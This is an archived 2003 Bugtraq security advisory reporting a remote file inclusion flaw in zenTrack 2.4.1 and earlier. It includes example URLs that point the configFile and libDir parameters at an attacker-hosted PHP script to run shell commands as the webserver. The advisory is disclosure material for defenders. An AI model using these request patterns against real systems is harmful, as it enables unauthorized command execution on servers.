lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Message-ID: <20030606010055.29379.qmail@www.securityfocus.com>
Date: 6 Jun 2003 01:00:55 -0000
From: <farking@...wnur.info>
To: bugtraq@...urityfocus.com
Subject: zenTrack Remote Command Execution Vulnerabilities




Subject: zenTrack Remote Command Execution Vulnerabilities
Author: farking (farking@...wnur.info)
Product: zenTrack 2.4.1 (latest) and below
Vendor: http://zendocs.phpzen.net/zentrack / 
http://sourceforge.net/projects/zentrack/
Status:  Vendor contacted (27/05/2003)
Location: http://farking.daemon.sh/advisories/zentrack-062003.txt
Greet to: corpsie & EvoIVGSR

Description
-----------

zenTrack is a flexible system for tracking work, requests, information, 
and customer care. 
The goal of the project is to provide a method for organizing, managing, 
and archiving requests, work, and information 
in a structured and reliable method. 

Details
-------

zenTrack vulnerability exist in header.php that hold zenTrack 
configuration settings. Some code

<?
:
  $libDir = "/web/zentrack/includes";
  $rootUrl = "http://www.yourhost.com/zentrack";
  $Debug_Mode = 0;
  $Demo_Mode = "off";
  $configFile = "$libDir/configVars.php";
:
?>


This allow anyone to take advantage of this vulnerability and run remote 
command as webserver privilege. For example:

http://[victim]/zentrack/index.php?configFile=http://[attacker]/cmd.php?
cmd=pwd

or

Create translator.class anywhere in your website contain php code that 
allow you to run command. For this example I'll 
create translator.class in the test directory:

http://[victim]/zentrack/www/index.php?libDir=http://
[attacker]/test/&cmd=pwd

If you dont wan't to see any error just copy translator.class as 
zenTrack.class :)

Other vulnerability is attacker can turn zenTrack demo mode to on or set 
zenTrack debug mode that will show extra info. 


------------------------------
farking (farking@...wnur.info)
http://farking.daemon.sh


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ